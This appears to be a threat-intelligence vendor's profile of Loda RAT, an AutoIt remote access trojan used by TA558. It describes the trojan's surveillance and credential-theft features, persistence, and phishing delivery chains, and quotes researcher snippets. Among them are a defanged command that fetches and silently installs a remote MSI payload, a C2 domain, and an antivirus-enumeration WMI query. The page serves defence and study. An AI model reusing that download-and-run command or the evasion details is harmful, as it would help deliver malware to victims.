Loda RAT is an AutoIt-based remote access trojan active since at least 2016 and used by multiple cybercrime actors. It has been especially prominent in campaigns attributed to TA558, a financially motivated threat actor targeting hospitality, travel, and related organizations, particularly in Latin America, through reservation-themed phishing. Loda has also appeared in broader phishing activity affecting victims in South America, Central America, the United States, and multiple industry verticals.
Loda combines remote administration, surveillance, credential theft, and payload delivery functions. Documented capabilities include host profiling, browser credential and cookie theft, keylogging, screenshot capture, microphone audio recording, webcam recording, file upload, receipt and execution of attacker-supplied payloads, and interactive messaging with the victim. It has also been observed collecting FileZilla connection credentials and deleting browser cookies after closing browsers. The malware reports detailed system information to command-and-control infrastructure, including operating system characteristics, user context, security product presence, display information, and peripheral availability such as webcams.
Persistence has been achieved through scheduled tasks, and later variants also used registry-based persistence. Loda employs obfuscation techniques typical of AutoIt malware, including encoded strings, concatenation, randomized variable initialization, and evolving string obfuscation across versions. More recent variants have used WMI to enumerate installed antivirus products, reflecting continued development aimed at defense evasion and host awareness.
Loda has been delivered through several phishing-driven infection chains, including malicious Office documents with macros, embedded Packager objects, PDF attachments, executable attachments, links, remote template mechanisms, and exploits such as CVE-2017-0199 and CVE-2017-11882. In some campaigns, multi-stage documents ultimately retrieved and executed an MSI package containing the RAT. It has functioned both as a primary payload and as an intermediate loader for additional malware.
Security vendors have observed versions including 1.0.0, 1.0.1, and 1.1.1 in the wild. The family is notable for pairing broad surveillance and credential-access features with flexible phishing-based delivery, making it a recurring commodity RAT in financially motivated intrusion activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Cisco Talos has observed a malware campaign that utilizes websites hosting a new version of Loda, a remote access trojan (RAT) written in AutoIT.
Notably, we found a document that used the recent CVE-2017-0199 exploit (Figure 1). Figure 1: CVE-2017-0199 document used to deliver Loda | Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims... Conclusion Loda malware is a robust keylogger and remote access Trojan with extensive capabilities for collecting and exfiltrating victim information from infected PCs.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT.
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Loda 1.1.1 now makes a WMI query to "winmgmts:\\localhost\root\SecurityCenter2" to enumerate installed antivirus solutions
For persistence, the new version now adds both a registry key and a scheduled task:
For persistence, the new version now adds both a registry key and a scheduled task:
Receive text from C&C and write to file (likely for batch files)
Within this payload, the command "cmd.exe & /C CD C: & msiexec.exe /i http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi /quiet" can be seen.
Webcam installed (Yes or No, enumerated using capGetDriverDescription from Avicap32.dll)
The second document is a Rich Text Format document that contains a payload within an obfuscated OLE object which is then executed by exploiting CVE-2017-11882, an arbitrary code execution vulnerability in some versions of Microsoft Office.
The malware checks in to a command and control (C&C) server and reports the following information: ... User account name
Installed AV Vendor (enumerated via running process names)... Send running process names to C&C
The C2 comms pointed to "4success[.]zapto[.]org" contain information about the infected host, including OS version, architecture and username.
Get file or directory sizes... Enumerate attached drives Enumerate common folder locations (Desktop/Pictures/Profile/Appdata/Temp)
The malware checks in to a command and control (C&C) server and reports the following information... We were able to observe the network traffic associated with these C&C communications
80 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access trojan used by TA558 in travel-themed phishing campaigns to enable remote access and follow-on activity.
Remote access trojan used by TA558 across multiple years; observed as a payload delivered via malicious Office documents and other delivery chains, enabling reconnaissance, data theft, and follow-on payload delivery.
AutoIT-based remote access trojan delivered via malicious documents and MSI installers. It steals usernames, passwords, browser cookies, logs keystrokes, records sound, takes screenshots, can display messages to victims, enumerates antivirus products via WMI, establishes persistence via registry key and scheduled task, and can read FileZilla recentservers.xml to obtain server credentials.
AutoIT-based malware used for spying and remote control of infected Windows systems. It establishes persistence via scheduled tasks, communicates with C2 servers, steals system and user information, uploads keylogger data, captures screenshots, records microphone and webcam input, manipulates files, executes downloaded payloads, and can act as an intermediate loader for additional malware.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.